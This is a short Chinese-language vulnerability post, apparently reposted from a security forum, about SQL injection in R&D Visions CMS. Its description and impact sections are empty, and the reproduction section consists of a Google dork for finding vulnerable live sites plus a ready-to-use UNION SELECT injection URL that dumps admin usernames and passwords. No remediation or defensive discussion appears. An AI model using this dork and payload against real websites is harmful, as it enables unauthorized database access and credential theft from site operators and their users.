# R&D Visions CMS SQL Injection
> 原文:[https://www.zhihuifly.com/t/topic/3101](https://www.zhihuifly.com/t/topic/3101)
# R&D Visions CMS SQL Injection
## 一、漏洞简介
## 二、漏洞影响
## 三、复现过程
Google Dork:
“`
intext:”Website by R&D Visions” inurl:.php?id= `intext:“CMS System by R&D Visions”`
“`
Demo:
“`
https://www.0-sec.org/home.php?newid=53[SQLi]
“`
Injection:
“`
https://www.0-sec.org/home.php?newid=-53+Union+Select+1,Group_ConCat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12+From+admin_user_log–+
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容